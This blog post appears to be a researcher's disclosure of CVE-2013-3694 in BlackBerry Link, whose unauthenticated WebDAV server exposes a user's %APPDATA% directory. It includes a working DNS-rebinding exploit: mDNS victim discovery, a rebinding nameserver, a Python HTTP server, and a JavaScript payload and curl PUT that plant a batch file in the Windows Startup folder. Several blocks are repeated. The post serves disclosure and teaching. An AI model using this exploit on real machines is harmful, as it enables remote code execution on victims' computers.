If you connect a pristine BlackBerry 10 device to a computer, it will identify itself as a SCSI CD-ROM, and attempt to autoplay the installation of BlackBerry Link.
$ lsusb -d 0x0FCA:
Bus 002 Device 006: ID 0fca:8020 Research In Motion, Ltd.
$ cdrecord --devices
-------------------------------------------------------------------------
0 dev='/dev/sg1' rwrw-- : 'RIM' 'PlayBook CD'
-------------------------------------------------------------------------
$ isoinfo -l -i /dev/sr0
Directory listing of /
d--------- 0 0 0 2048 Dec 19 2012 [ 21 02] .
d--------- 0 0 0 2048 Dec 19 2012 [ 21 02] ..
---------- 0 0 0 72 Dec 19 2012 [ 28 00] AUTORUN.INF
d--------- 0 0 0 2048 Dec 19 2012 [ 22 02] BACKGROUND
---------- 0 0 0 38198 Dec 19 2012 [ 29 00] BLACKBERRY LINK INSTALLATI.RTF
d--------- 0 0 0 2048 Dec 19 2012 [ 23 02] DRIVERS
---------- 0 0 0 95326 Dec 19 2012 [ 19546 00] README.RTF
---------- 0 0 0 58251649 Dec 19 2012 [ 19593 00] START.DMG
---------- 0 0 0 432808 Dec 19 2012 [ 48 00] START.EXE
Directory listing of /BACKGROUND/
d--------- 0 0 0 2048 Dec 19 2012 [ 22 02] .
d--------- 0 0 0 2048 Dec 19 2012 [ 21 02] ..
---------- 0 0 0 5655 Dec 19 2012 [ 48037 00] BACKGROUND.PNG
Directory listing of /DRIVERS/
d--------- 0 0 0 2048 Dec 19 2012 [ 23 02] .
d--------- 0 0 0 2048 Dec 19 2012 [ 21 02] ..
---------- 0 0 0 36311440 Dec 19 2012 [ 260 00] BLACKBERRYDEVICEMANAGER.EXE
---------- 0 0 0 2038440 Dec 19 2012 [ 17991 00] BLACKBERRYLAUNCHER.EXE
---------- 0 0 0 83032 Dec 19 2012 [ 18987 00] SETUP.EXE
---------- 0 0 0 10 Dec 19 2012 [ 19028 00] VERSION.TXT
Bus 002 Device 006: ID 0fca:8020 Research In Motion, Ltd.
$ cdrecord --devices
-------------------------------------------------------------------------
0 dev='/dev/sg1' rwrw-- : 'RIM' 'PlayBook CD'
-------------------------------------------------------------------------
$ isoinfo -l -i /dev/sr0
Directory listing of /
d--------- 0 0 0 2048 Dec 19 2012 [ 21 02] .
d--------- 0 0 0 2048 Dec 19 2012 [ 21 02] ..
---------- 0 0 0 72 Dec 19 2012 [ 28 00] AUTORUN.INF
d--------- 0 0 0 2048 Dec 19 2012 [ 22 02] BACKGROUND
---------- 0 0 0 38198 Dec 19 2012 [ 29 00] BLACKBERRY LINK INSTALLATI.RTF
d--------- 0 0 0 2048 Dec 19 2012 [ 23 02] DRIVERS
---------- 0 0 0 95326 Dec 19 2012 [ 19546 00] README.RTF
---------- 0 0 0 58251649 Dec 19 2012 [ 19593 00] START.DMG
---------- 0 0 0 432808 Dec 19 2012 [ 48 00] START.EXE
Directory listing of /BACKGROUND/
d--------- 0 0 0 2048 Dec 19 2012 [ 22 02] .
d--------- 0 0 0 2048 Dec 19 2012 [ 21 02] ..
---------- 0 0 0 5655 Dec 19 2012 [ 48037 00] BACKGROUND.PNG
Directory listing of /DRIVERS/
d--------- 0 0 0 2048 Dec 19 2012 [ 23 02] .
d--------- 0 0 0 2048 Dec 19 2012 [ 21 02] ..
---------- 0 0 0 36311440 Dec 19 2012 [ 260 00] BLACKBERRYDEVICEMANAGER.EXE
---------- 0 0 0 2038440 Dec 19 2012 [ 17991 00] BLACKBERRYLAUNCHER.EXE
---------- 0 0 0 83032 Dec 19 2012 [ 18987 00] SETUP.EXE
---------- 0 0 0 10 Dec 19 2012 [ 19028 00] VERSION.TXT
$ isoinfo -x /AUTORUN.INF -i /dev/sr0
[AutoRun]
shellexecute=start.exe
icon=start.exe
label=BlackBerry CD
[AutoRun]
shellexecute=start.exe
icon=start.exe
label=BlackBerry CD
BlackBerry Link is the synchronization and management software for BlackBerry 10, and I couldn't help notice it immediately spawns an nginx process after installation.
Locating the nginx configuration, I found it’s being used as a WebDAV server, listening on an IPv6 address I don't recognise. It appears to be serving my %APPDATA% directory with no access control or authentication.
$ cat nginx.conf
...
server {
listen [fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080 default_server;
server_name rimdav;
location / {
folder_config;
}
...
dav_access all:rw;
$ netstat -p TCPv6 -a
Active Connections
Proto Local Address Foreign Address State
TCP [::]:135 WIN-DBVU5A9QFHT:0 LISTENING
TCP [::]:445 WIN-DBVU5A9QFHT:0 LISTENING
TCP [::]:1025 WIN-DBVU5A9QFHT:0 LISTENING
TCP [::]:1026 WIN-DBVU5A9QFHT:0 LISTENING
TCP [::]:1027 WIN-DBVU5A9QFHT:0 LISTENING
TCP [::]:1029 WIN-DBVU5A9QFHT:0 LISTENING
TCP [::]:1032 WIN-DBVU5A9QFHT:0 LISTENING
TCP [::]:1047 WIN-DBVU5A9QFHT:0 LISTENING
TCP [::1]:1040 WIN-DBVU5A9QFHT:0 LISTENING
TCP [::1]:1040 WIN-DBVU5A9QFHT:1049 ESTABLISHED
TCP [::1]:1049 WIN-DBVU5A9QFHT:1040 ESTABLISHED
TCP [fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080 WIN-DBVU5A9QFHT:0 LISTENING
$ curl -g -X PUT --data "calc.exe" "http://[fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080/Start%20Menu/Programs/Startup/exploit.bat"
This looks wrong for multiple reasons. Apart from breaking the NT security model, the address is published in multicast DNS, so everyone on the network can see it.
The exploit is simple, you use DNS rebinding to get permission to XMLHttpRequest to the WebDAV share, then you can read or write anywhere relative to a victims %APPDATA% directory.
I wrote a quick IPv6 rebinding nameserver to test it. The idea is to just extract two AAAA records from the query labels, then return one at random with a very short (1 second) TTL. The attack will work on IPv4 networks as well, where you switch between returning 1 answer and 0 answers for A queries, but I haven't implemented A record support.
It works like this:
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address 1122:3344:5566:7788:99aa:1122:3344:5566
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address 1122:3344:5566:7788:99aa:1122:3344:5566
As you can see, it returns a random address specified in the query labels, switching between a host you control and a host you don’t.
So lets search for a victim on my network, you can use dig to query the multicast address 224.0.0.251 on port 5353 or avahi-browse if you have it:
$ avahi-browse -r -t _bp2p._tcp
+ eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5 _bp2p._tcp local
+ eth0 IPv4 Friendly_DA52877F19217E9B_7A0D69D13ECAE391 _bp2p._tcp local
= eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5 _bp2p._tcp local
hostname = [3c222e49b3165fda656214723f757f.local]
address = [fd3c:222e:49b3:165f:da65:6214:723f:757f]
port = [8080]
txt = []
+ eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5 _bp2p._tcp local
+ eth0 IPv4 Friendly_DA52877F19217E9B_7A0D69D13ECAE391 _bp2p._tcp local
= eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5 _bp2p._tcp local
hostname = [3c222e49b3165fda656214723f757f.local]
address = [fd3c:222e:49b3:165f:da65:6214:723f:757f]
port = [8080]
txt = []
Then I start an http server on my machine on a matching port:
$ python
Python 2.7.3 (default, Sep 26 2013, 20:03:06)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket
>>> from BaseHTTPServer import HTTPServer
>>> from SimpleHTTPServer import SimpleHTTPRequestHandler
>>>
>>> class HTTPServerV6(HTTPServer):
... address_family = socket.AF_INET6
...
>>> HTTPServerV6(('::', 8080), SimpleHTTPRequestHandler).serve_forever()
Python 2.7.3 (default, Sep 26 2013, 20:03:06)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket
>>> from BaseHTTPServer import HTTPServer
>>> from SimpleHTTPServer import SimpleHTTPRequestHandler
>>>
>>> class HTTPServerV6(HTTPServer):
... address_family = socket.AF_INET6
...
>>> HTTPServerV6(('::', 8080), SimpleHTTPRequestHandler).serve_forever()
I send the victim a link to a page that reloads http://aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us:8080 in an iframe until I get the server I control, and then return something like this:
<html>
<head></head>
<head></head>
<body>
<h1>Please Wait...</h1>
<script>
// Where you want to write to on victim, relative to %APPDATA%.
var path = "/Start%20Menu/Programs/Startup/exploit.bat";
// What you want to write there.
var data = "calc.exe";
function sendRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("PUT", document.location.origin + path, false);
xhr.send(data);
}
setInterval(sendRequest, 1000);
</script>
<h1>Please Wait...</h1>
<script>
// Where you want to write to on victim, relative to %APPDATA%.
var path = "/Start%20Menu/Programs/Startup/exploit.bat";
// What you want to write there.
var data = "calc.exe";
function sendRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("PUT", document.location.origin + path, false);
xhr.send(data);
}
setInterval(sendRequest, 1000);
</script>
</body>
</html>
After a few seconds, the address should rebind and the browser will PUT the batch file into their Startup directory, I verified this works with the latest BlackBerry Link on Windows 7.
This vulnerability is CVE-2013-3694, which RIM are scheduled to resolve today.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.